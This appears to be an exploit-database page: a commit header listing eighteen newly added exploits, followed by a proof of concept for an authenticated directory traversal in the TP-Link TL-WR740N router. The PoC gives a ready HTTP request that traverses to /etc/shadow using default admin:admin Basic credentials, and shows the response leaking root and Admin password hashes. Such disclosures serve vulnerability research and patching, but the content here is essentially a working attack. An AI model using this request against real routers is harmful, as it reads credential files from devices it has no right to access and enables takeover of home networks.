3a3c03321c
18 changes to exploits/shellcodes/ghdb Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution ABB FlowX v4.00 - Exposure of Sensitive Information TP-Link TL-WR740N - Authenticated Directory Transversal Microsoft Edge 114.0.1823.67 (64-bit) - Information Disclosure Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS) Blackcat Cms v1.4 - Remote Code Execution (RCE) Blackcat Cms v1.4 - Stored XSS CmsMadeSimple v2.2.17 - Remote Code Execution (RCE) CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template Injection (SSTI) CmsMadeSimple v2.2.17 - Stored Cross-Site Scripting (XSS) Joomla! com_booking component 2.4.9 - Information Leak (Account enumeration) Online Piggery Management System v1.0 - unauthenticated file upload vulnerability phpfm v1.7.9 - Authentication type juggling PimpMyLog v1.7.14 - Improper access control PMB 7.4.6 - SQL Injection Statamic 4.7.0 - File-Inclusion Vaidya-Mitra 1.0 - Multiple SQLi
56 lines
No EOL
1.9 KiB
Text
56 lines
No EOL
1.9 KiB
Text
# Exploit Title: TP-Link TL-WR740N - Authenticated Directory Transversal
|
|
# Date: 13/7/2023
|
|
# Exploit Author: Anish Feroz (Zeroxinn)
|
|
# Vendor Homepage: http://www.tp-link.com
|
|
# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n
|
|
# Tested on: TP-Link TL-WR740N
|
|
|
|
---------------------------POC---------------------------
|
|
|
|
Request
|
|
-------
|
|
|
|
GET /help/../../../etc/shadow HTTP/1.1
|
|
Host: 192.168.0.1:8082
|
|
Authorization: Basic YWRtaW46YWRtaW4=
|
|
Upgrade-Insecure-Requests: 1
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
|
Accept-Encoding: gzip, deflate
|
|
Accept-Language: en-US,en;q=0.9
|
|
Connection: close
|
|
|
|
Response
|
|
--------
|
|
|
|
HTTP/1.1 200 OK
|
|
Server: Router Webserver
|
|
Connection: close
|
|
WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router WR740N"
|
|
Content-Type: text/html
|
|
|
|
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
|
|
<HTML>
|
|
<HEAD><TITLE>TL-WR740N</TITLE>
|
|
<META http-equiv=Pragma content=no-cache>
|
|
<META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT">
|
|
<LINK href="/dynaform/css_help.css" rel=stylesheet type="text/css">
|
|
<SCRIPT language="javascript" type="text/javascript"><!--
|
|
if(window.parent == window){window.location.href="http://192.168.0.1";}
|
|
function Click(){ return false;}
|
|
document.oncontextmenu=Click;
|
|
function doPrev(){history.go(-1);}
|
|
//--></SCRIPT>
|
|
root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
|
|
Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
|
|
bin::10933:0:99999:7:::
|
|
daemon::10933:0:99999:7:::
|
|
adm::10933:0:99999:7:::
|
|
lp:*:10933:0:99999:7:::
|
|
sync:*:10933:0:99999:7:::
|
|
shutdown:*:10933:0:99999:7:::
|
|
halt:*:10933:0:99999:7:::
|
|
uucp:*:10933:0:99999:7:::
|
|
operator:*:10933:0:99999:7:::
|
|
nobody::10933:0:99999:7:::
|
|
ap71::10933:0:99999:7::: |